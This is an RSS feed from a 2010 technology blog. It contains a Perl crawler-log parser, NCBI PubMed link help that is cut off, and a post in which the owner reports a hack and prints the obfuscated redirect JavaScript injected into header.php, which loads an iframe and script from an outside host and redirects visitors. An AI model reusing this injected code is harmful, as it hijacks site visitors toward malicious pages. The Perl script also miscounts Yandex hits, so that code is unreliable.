<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" version="2.0">

<channel>
	<title>my-whiteboard</title>
	
	<link>http://www.my-whiteboard.com</link>
	<description>Business in Information Technology &amp; Biotechnology</description>
	<lastBuildDate>Wed, 10 Mar 2010 23:50:58 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/My-whiteboard" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="my-whiteboard" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
		<title>CloneEZ Recombination Protocol</title>
		<link>http://www.my-whiteboard.com/cloneez-recombination-protocol/</link>
		<comments>http://www.my-whiteboard.com/cloneez-recombination-protocol/#comments</comments>
		<pubDate>Wed, 10 Mar 2010 23:50:58 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/cloneez-recombination-protocol/</guid>
		<description><![CDATA[Sorry, this is private post]]></description>
			<content:encoded><![CDATA[<div class='category_access_protected_post'>Sorry, this is private post</div>]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/cloneez-recombination-protocol/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Gateway Cloning BP and LR and Reactions</title>
		<link>http://www.my-whiteboard.com/gateway-cloning-bp-and-lr-and-reactions/</link>
		<comments>http://www.my-whiteboard.com/gateway-cloning-bp-and-lr-and-reactions/#comments</comments>
		<pubDate>Wed, 10 Mar 2010 23:10:39 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/gateway-cloning-bp-and-lr-and-reactions/</guid>
		<description><![CDATA[Sorry, this is private post]]></description>
			<content:encoded><![CDATA[<div class='category_access_protected_post'>Sorry, this is private post</div>]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/gateway-cloning-bp-and-lr-and-reactions/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Shopwiki IP list: How to block spam bot</title>
		<link>http://www.my-whiteboard.com/shopwiki-ip-list-how-to-block-spam-bot/</link>
		<comments>http://www.my-whiteboard.com/shopwiki-ip-list-how-to-block-spam-bot/#comments</comments>
		<pubDate>Wed, 10 Mar 2010 18:15:07 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/shopwiki-ip-list-how-to-block-spam-bot/</guid>
		<description><![CDATA[Sorry, this is private post]]></description>
			<content:encoded><![CDATA[<div class='category_access_protected_post'>Sorry, this is private post</div>]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/shopwiki-ip-list-how-to-block-spam-bot/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Perl http log file parser</title>
		<link>http://www.my-whiteboard.com/perl-http-log-file-parser/</link>
		<comments>http://www.my-whiteboard.com/perl-http-log-file-parser/#comments</comments>
		<pubDate>Wed, 10 Mar 2010 16:49:56 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Perl]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/perl-http-log-file-parser/</guid>
		<description><![CDATA[This is my http log file parse. It will tell you who is crawling your site. Hope you like it
#!/usr/local/perluse strict;my @files=&#60;*_access.log*&#62;;
my %address=();my %agents=();foreach my $file (@files)
{&#160;&#160;&#160; my $ggl=0;&#160;&#160;&#160; my $yahoo=0;&#160;&#160;&#160; my $cuil=0;&#160;&#160;&#160; my $twiceler=0;&#160;&#160;&#160; my $Jeeves=0;&#160;&#160;&#160; my $Yandex=0;&#160;&#160;&#160; my $legs=0;&#160;&#160;&#160; my $Baiduspider=0;&#160;&#160;&#160; my $dotnetdotcom=0;&#160;&#160;&#160; my $msn=0;&#160;&#160;&#160; my $seoprofiler=0;
&#160;&#160;&#160; open (IN, &#8220;$file&#8221;);&#160;&#160;&#160; my $outfile=&#8221;$file.txt&#8221;;&#160;&#160;&#160; open [...]]]></description>
			<content:encoded><![CDATA[<p>This is my http log file parse. It will tell you who is crawling your site. Hope you like it</p>
<blockquote><p>#!/usr/local/perl<br />use strict;<br />my @files=&lt;*_access.log*&gt;;</p>
<p>my %address=();<br />my %agents=();<br />foreach my $file (@files)</p>
<p>{<br />&nbsp;&nbsp;&nbsp; my $ggl=0;<br />&nbsp;&nbsp;&nbsp; my $yahoo=0;<br />&nbsp;&nbsp;&nbsp; my $cuil=0;<br />&nbsp;&nbsp;&nbsp; my $twiceler=0;<br />&nbsp;&nbsp;&nbsp; my $Jeeves=0;<br />&nbsp;&nbsp;&nbsp; my $Yandex=0;<br />&nbsp;&nbsp;&nbsp; my $legs=0;<br />&nbsp;&nbsp;&nbsp; my $Baiduspider=0;<br />&nbsp;&nbsp;&nbsp; my $dotnetdotcom=0;<br />&nbsp;&nbsp;&nbsp; my $msn=0;<br />&nbsp;&nbsp;&nbsp; my $seoprofiler=0;</p>
<p>&nbsp;&nbsp;&nbsp; open (IN, &#8220;$file&#8221;);<br />&nbsp;&nbsp;&nbsp; my $outfile=&#8221;$file.txt&#8221;;<br />&nbsp;&nbsp;&nbsp; open (OUT, &#8220;&gt;$outfile&#8221;);<br />&nbsp;&nbsp;&nbsp; while (&lt;IN&gt;)<br />&nbsp;&nbsp;&nbsp; {&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; my $orig_line=$_;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; my ($line) = $orig_line;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; #$line=~ s/\///g;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; my @arr= split (/\&#8221;/, $line);<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; my $ip=shift(@arr);<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; my $agent=pop(@arr);<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $agent=pop(@arr);<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; @arr=split(/ /,$ip);<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $ip=shift(@arr);<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if&nbsp; (exists $address{$ip}) <br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;my $count= $address { $ip } ;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $count++;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; #&nbsp;&nbsp;&nbsp; print $ip .&#8221; &#8220;.$count.&#8221;\n&#8221;;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;$address{$ip}=$count;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; else<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $address{$ip}=1;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $agents{$ip}=$agent;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }</p>
<p>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if ($line =~ /twiceler/ or $line =~ /cuil\.com/ or $line =~ /Yahoo\! Slurp/ or $line =~ /Googlebot/ or $line =~ /Ask Jeeves/ or <br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $line =~ /Yandex/ or $line =~ /80legs/ or&nbsp; $line =~ /Baiduspider/ or $line =~ /dotnetdotcom/ or $line=~ /seoprofiler/<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; or $line=~ /msn.com/</p>
<p>)<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {</p>
<p>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; #&nbsp;&nbsp;&nbsp; print $line .&#8221;\n&#8221;;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if ($line =~ /msn\.com/)<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp; $msn++;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if ($line =~ /twiceler/)<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;$twiceler++;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if ($line =~ /cuil\.com/)<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;$cuil++;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if ($line =~ /Yahoo\! Slurp/)<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;$yahoo++;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if ($line =~ /Googlebot/)<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp; $ggl++;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if ($line =~ /Ask Jeeves/)<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp; $Jeeves++;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if ($line =~ /Ask Jeeves/)<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $Yandex++;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if ($line =~ /80legs/)<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $legs++;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if ($line =~ /Baiduspider/)<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $Baiduspider++;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if ($line =~ /dotnetdotcom/)<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $dotnetdotcom++;&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; if ($line =~ /seoprofiler/)<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; $seoprofiler++;&nbsp;&nbsp;&nbsp; <br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; else<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; {<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; print OUT $orig_line;<br />&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; }<br />&nbsp;&nbsp;&nbsp; }<br />#&nbsp;&nbsp;&nbsp; unlink ($file);<br />#&nbsp;&nbsp;&nbsp; rename ($outfile, $file);<br />&nbsp;&nbsp;&nbsp; print &#8220;google: $ggl, Yahoo: $yahoo, Cuil: $cuil, twiceler: $twiceler, Jeeves: $Jeeves, Yandex: $Yandex, legs: $legs\n&#8221;;<br />&nbsp;&nbsp; print &#8220;Baiduspider: $Baiduspider, dotnetdotcom: $dotnetdotcom,&nbsp;&nbsp; msn: $msn, seoprofiler: $seoprofiler \n&#8221;;<br />}</p>
<p>open (OUT, &#8220;&gt;grant.txt&#8221;);<br />foreach my $key (sort hashValueDescendingNum&nbsp; (keys(%address)))<br />{</p>
<p>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; print OUT &#8220;$address{$key} \t $key\t $agents{$key}\n&#8221;;</p>
<p>}<br />close(OUT);</p>
<p>sub hashValueAscendingNum {<br />&nbsp;&nbsp; $address{$a} &lt;=&gt; $address{$b};<br />}</p>
<p>sub hashValueDescendingNum {<br />&nbsp;&nbsp; $address{$b} &lt;=&gt; $address{$a};<br />}</p>
</blockquote>
<div class="zemanta-pixie"><img class="zemanta-pixie-img" alt="" src="http://img.zemanta.com/pixy.gif?x-id=9b3d1809-60a4-8ef3-94ab-f20a2792f9d6" /></div>
]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/perl-http-log-file-parser/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress was hacked by redirect Javascript</title>
		<link>http://www.my-whiteboard.com/wordpress-was-hacked-by-redirect-javascript/</link>
		<comments>http://www.my-whiteboard.com/wordpress-was-hacked-by-redirect-javascript/#comments</comments>
		<pubDate>Mon, 08 Mar 2010 02:23:28 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/wordpress-was-hacked-by-redirect-javascript/</guid>
		<description><![CDATA[This web site was hacked by the bad guy. He inserted javascript code to header.php, and the web site was redirected to yahoo&#8217;s hotjob.com or other junk web sites. The following is the hacker&#8217;s javascript code:
&#60;script language=&#8221;javascript&#8221;&#62;document.write(unescape(&#8216;%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E&#8217;));dF(&#8216;%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1&#8242;);
&#60;/script&#62;
Anybody knows how to decode this?


]]></description>
			<content:encoded><![CDATA[<p>This web site was hacked by the bad guy. He inserted javascript code to header.php, and the web site was redirected to yahoo&#8217;s hotjob.com or other junk web sites. The following is the hacker&#8217;s javascript code:</p>
<blockquote><p>&lt;script language=&#8221;javascript&#8221;&gt;<br />document.write(unescape(&#8216;%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E&#8217;))<br />;dF(&#8216;%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1&#8242;);</p>
<p>&lt;/script&gt;</p></blockquote>
<p>Anybody knows how to decode this?</p>
<p>
<div class="zemanta-pixie"><img class="zemanta-pixie-img" alt="" src="http://img.zemanta.com/pixy.gif?x-id=be2b5c9f-4830-81b1-b00d-7f861eebb3fd" /></div>
]]></content:encoded>
			<wfw:commentRss>http://www.my-whiteboard.com/wordpress-was-hacked-by-redirect-javascript/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Web Link to NCBI Entrez Databases</title>
		<link>http://www.my-whiteboard.com/web-link-to-ncbi-entrez-databases/</link>
		<comments>http://www.my-whiteboard.com/web-link-to-ncbi-entrez-databases/#comments</comments>
		<pubDate>Sun, 14 Feb 2010 16:39:41 +0000</pubDate>
		<dc:creator>PhDs</dc:creator>
				<category><![CDATA[Perl]]></category>

		<guid isPermaLink="false">http://www.my-whiteboard.com/?p=441</guid>
		<description><![CDATA[
PubMed  


Retrieve PubMed citations in HTML or Text format using PubMed IDs (PMID)


Search PubMed with terms


PubMed Link to related records


PubMed Feature Pages


NLM currently leases PubMed journal citations, at no charge.

Retrieve PubMed Citations
Base URL: http://www.ncbi.nlm.nih.gov/pubmed
To retrieve results in HTML or text format use PubMed Unique Identifiers (PMID).


Retrieval parameters: 


report=display format (DocSum is the default display, [...]]]></description>
			<content:encoded><![CDATA[<div class="dft sec" id="linkshelp.PubMed">
<h2 class="sec-title">PubMed  </h2>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main"><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Retrieve_PubMed_Cita" id="id148278">Retrieve PubMed</a> citations in HTML or Text format using PubMed IDs (PMID)</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Search_PubMed" id="id148292">Search PubMed</a> with terms</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Link" id="id148305">PubMed Link</a> to related records</p>
</li>
<li class="reg">
<p class="text-dec bookmain main">PubMed <a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.PubMed_Feature_Pages" id="id148320">Feature Pages</a></p>
</li>
</ul>
<p class="text-dec bookmain main">NLM currently <span class="ext-reflink"><a href="http://www.nlm.nih.gov/databases/leased.html" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink">leases PubMed</a></span> journal citations, at no charge.</p>
<div class="dft sec" id="linkshelp.Retrieve_PubMed_Cita">
<h3>Retrieve PubMed Citations</h3>
<p class="text-dec bookmain main">Base URL: <span class="ext-reflink"><a href="http://www.ncbi.nlm.nih.gov/pubmed/" target="pmc_ext" onclick="focuswin('pmc_ext')" class="ext-reflink"><b>http://www.ncbi.nlm.nih.gov/pubmed</b></a></span></p>
<p class="text-dec bookmain main">To retrieve results in <b>HTML</b> or<b> text format</b> use PubMed Unique Identifiers (PMID).</p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main">Retrieval parameters: </p>
<ul class="bullet">
<li class="reg">
<p class="text-dec bookmain main"><b>report=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Display_Formats" id="id110586">display format</a> (DocSum is the default display, except for a single citation)</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>format=</b>text (HTML is the default format.)</p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>tool=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Tool" id="id110609">resource</a></p>
</li>
<li class="reg">
<p class="text-dec bookmain main"><b>email=</b><a class="int-reflink unknown sec xref6" href="http://www.ncbi.nlm.nih.gov/bookshelf/br.fcgi?book=helplinks&amp;part=linkshelp#linkshelp.Email_Address" id="id110624">address</a></p>
</li>
</ul>
</li>
</ul>
<p class="text-dec bookmain main"><b>Example</b>:</p>
